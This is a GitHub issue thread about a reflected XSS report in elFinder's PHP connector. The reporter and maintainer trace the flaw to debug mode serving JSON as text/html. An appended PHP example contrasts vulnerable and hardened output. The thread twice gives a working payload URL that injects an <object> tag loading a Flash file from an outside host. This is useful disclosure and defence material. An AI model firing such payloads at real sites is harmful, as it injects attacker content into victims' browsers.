
Possible XSS issue #1975

Closed
dleffler opened this issue Apr 19, 2017 · 7 comments

Comments

@dleffler

I've been notified of an XSS security vulnerability within elFinder. The fix is to add htmlspecialchars($data) into line 309 of elFinderConnector.class.php to filter the json output.

    $out = json_encode(htmlspecialchars($data));

I have additional details, including the payload and other research, as sent to me by chengable.

@nao-pon (Member)

nao-pon commented Apr 20, 2017

@dleffler Since data sent from the connector may contain HTML tags, we cannot accept this proposal. Please sanitize your own data separately. Or use fm.escape() to escape on the client side.

nao-pon closed this as completed Apr 20, 2017

@dleffler (Author)

Perhaps the fix given to me wasn't the real fix... here is the payload:

    localhost/connector.php?cmd=open&target=l1_asdl<object%20allowscriptaccess=always>%20<param%20name=url%20value=http%3A%2F%2Fmhz.pw%2Fgame%2Fxss%2Falert.swf>

@nao-pon (Member)

nao-pon commented Apr 20, 2017

Giving that payload to the elFinder connector, the following response is returned.

    {"error":["errOpen","#l1_asdl<object allowscriptaccess=always> <param name=url value=http:\/\/mhz.pw\/game\/xss\/alert.swf>","errFolderNotFound"]}

This is the error dialog displayed by that data.

[Screenshot: the elFinder 2.1 error dialog showing that error text, captured on the hypweb.net elfinder-nightly develop demo]

It does not seem to be vulnerable to XSS.

@dleffler (Author)

This seems to only occur when 'debug' is turned ON (where the output is not escaped). With a test setup:

    http://localhost/elFinder/php/connector.php?cmd=open&target=l1_asdl<object%20allowscriptaccess=always>%20<param%20name=url%20value=http%3A%2F%2Fmhz.pw%2Fgame%2Fxss%2Falert.swf>

@nao-pon (Member)

nao-pon commented Apr 22, 2017

I am testing in debug mode, but I cannot reproduce this problem.
Could you explain the detailed procedure to reproduce this problem?

@dleffler (Author)

  1. extract elFinder into your web folder into folder named 'elFinder'
  2. rename php/connector.php.dist to connector.php
  3. browse to the above url in your browser

The issue will not appear with connector.minimal.php.dist, since debug is not passed to elFinderConnector. It appears the issue arises if you force JSON output as text/html.

@nao-pon (Member)

nao-pon commented Apr 23, 2017

Yes, I understood. I was checking the display on the elFinder client. text/plain should be returned in the content type when debugging.
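The situation the thread converges on (the request's target string is reflected unescaped inside the JSON "error" array, which is harmless as JSON but becomes a reflected XSS once debug mode serves that body as text/html), as an added PHP example that is not elFinder's own code: it models the connector's output step with a vulnerable variant, a hardened variant that follows the maintainer's suggestion of text/plain in debug mode, and a check a tester can apply to any response to decide whether the reflection is actually exploitable. The function names, the header array shape and the response-building helper are assumptions for illustration; the target string is the URL-decoded payload from the thread.

```php
<?php
// Added example, not elFinder code. Function names and the header-array
// shape are assumptions for illustration only.

// Shaped like the connector reply quoted in the thread: the unvalidated
// target string is echoed back inside the "error" array.
function build_error_response(string $target): array
{
    return ['error' => ['errOpen', '#' . $target, 'errFolderNotFound']];
}

// Vulnerable variant: in debug mode the JSON is served as text/html, so the
// browser parses the body as markup and the injected <object> tag is live.
function emit_response_vulnerable(array $data, bool $debug): array
{
    $headers = [
        'Content-Type' => $debug
            ? 'text/html; charset=utf-8'
            : 'application/json; charset=utf-8',
    ];
    return [$headers, json_encode($data)];
}

// Hardened variant: never text/html. text/plain while debugging (as the
// maintainer suggests), application/json otherwise; nosniff blocks MIME
// sniffing, and the JSON_HEX_* flags encode < > & ' " as \uXXXX so that even
// a misconfigured content type cannot turn the body into executable markup.
function emit_response_hardened(array $data, bool $debug): array
{
    $headers = [
        'Content-Type' => $debug
            ? 'text/plain; charset=utf-8'
            : 'application/json; charset=utf-8',
        'X-Content-Type-Options' => 'nosniff',
    ];
    $body = json_encode(
        $data,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    return [$headers, $body];
}

// Tester's check: the reflection is only exploitable if the browser will
// render the body as HTML AND a raw tag survives in it.
function is_exploitable(array $headers, string $body): bool
{
    $contentType = $headers['Content-Type'] ?? '';
    $servedAsHtml = stripos($contentType, 'text/html') === 0;
    $hasRawTag = preg_match('/<[a-z]/i', $body) === 1;
    return $servedAsHtml && $hasRawTag;
}

// Usage: the payload from the thread, URL-decoded as the connector sees it.
$target = 'l1_asdl<object allowscriptaccess=always> '
    . '<param name=url value=http://mhz.pw/game/xss/alert.swf>';
$data = build_error_response($target);

[$headers, $body] = emit_response_vulnerable($data, true);
echo 'vulnerable, debug on: ', is_exploitable($headers, $body) ? 'XSS' : 'safe', PHP_EOL;

[$headers, $body] = emit_response_hardened($data, true);
echo 'hardened, debug on:   ', is_exploitable($headers, $body) ? 'XSS' : 'safe', PHP_EOL;

[$headers, $body] = emit_response_vulnerable($data, false);
echo 'vulnerable, debug off: ', is_exploitable($headers, $body) ? 'XSS' : 'safe', PHP_EOL;
```

The check mirrors why the maintainer could not reproduce the report on the live client: with debug off the same unescaped string arrives as application/json and is only ever placed in the page by the elFinder client, which is where fm.escape() applies. The server-side fix is therefore the content type (and nosniff), not htmlspecialchars() on the whole payload, which would also corrupt legitimate HTML in connector data and, applied to an array, does not work at all.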
